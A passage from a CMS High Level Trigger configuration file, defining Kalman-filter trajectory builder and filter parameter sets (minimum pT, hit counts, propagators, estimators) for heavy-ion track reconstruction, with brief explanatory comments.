ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedTripletStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialForMixedStep" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPMixedTripletStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetHighPtTripletStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.7 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtQuadStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtQuadStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelLessStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPPixelLessStepChi2ChargeMeasurementEstimator16" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
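# Strip cluster charge cut referenced by the minGoodStripCharge parameters above: the
# value is the minimum accepted cluster charge (presumably in electrons) for the
# "Loose" working point.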
HLTSiStripClusterChargeCutLoose = cms.PSet( value = cms.double( 1620.0 ) )
HLTPSetDetachedQuadStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedQuadStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPDetachedQuadStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetInitialStepTrajectoryFilterShapePreSplittingPPOnAA = cms.PSet(
ComponentType = cms.string( "StripSubClusterShapeTrajectoryFilter" ),
subclusterCutSN = cms.double( 12.0 ),
trimMaxADC = cms.double( 30.0 ),
seedCutMIPs = cms.double( 0.35 ),
subclusterCutMIPs = cms.double( 0.45 ),
subclusterWindow = cms.double( 0.7 ),
maxNSat = cms.uint32( 3 ),
trimMaxFracNeigh = cms.double( 0.25 ),
maxTrimmedSizeDiffNeg = cms.double( 1.0 ),
seedCutSN = cms.double( 7.0 ),
layerMask = cms.PSet(
TOB = cms.bool( False ),
TIB = cms.vuint32( 1, 2 ),
TID = cms.vuint32( 1, 2 ),
TEC = cms.bool( False )
),
maxTrimmedSizeDiffPos = cms.double( 0.7 ),
trimMaxFracTotal = cms.double( 0.15 )
)
HLTPSetInitialStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.6 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 2.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelLessStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 2.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 0 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryFilterPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryFilterInOutPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 0.1 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelPairStepTrajectoryBuilderPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( False ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilterPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPPixelPairStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelPairStepTrajectoryFilterInOutPPOnAA" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
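# The "ForFullTrackingPPOnAA" PSets that follow repeat the PPOnAA filters/builders above
# with higher minPt thresholds (mostly 1-5 GeV); presumably the variants used when full
# iterative tracking is run on heavy-ion data (assumption based on the naming).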
HLTPSetInitialStepTrajectoryFilterBasePreSplittingForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
maxCCCLostHits = cms.int32( 0 ),
nSigmaMinPt = cms.double( 5.0 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilderPreSplittingForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterPreSplittingForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetInitialStepTrajectoryFilterPreSplittingForFullTrackingPPOnAA = cms.PSet(
ComponentType = cms.string( "CompositeTrajectoryFilter" ),
filters = cms.VPSet(
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterBasePreSplittingForFullTrackingPPOnAA" ) ),
cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterShapePreSplittingPPOnAA" ) )
)
)
HLTPSetInitialStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 4 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
maxCCCLostHits = cms.int32( 0 ),
nSigmaMinPt = cms.double( 5.0 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetInitialStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetInitialStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 1 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtQuadStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtQuadStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtQuadStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetHighPtTripletStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 1.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetHighPtTripletStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
  ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
  MeasurementTrackerName = cms.string( "" ),  # default value, added for consistency with the other GroupedCkfTrajectoryBuilder PSets in this section
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetHighPtTripletStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 3 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtTripletStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 2.8 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtTripletStepTrajectoryBuilderForFullTrackingPPOnAA = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtTripletStepTrajectoryFilterForFullTrackingPPOnAA" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 4 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPLowPtTripletStepChi2ChargeMeasurementEstimator9" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfBaseTrajectoryFilter_block" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 10.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedQuadStepTrajectoryFilterForFullTrackingPPOnAA = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 0 ),
minPt = cms.double( 5.0 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
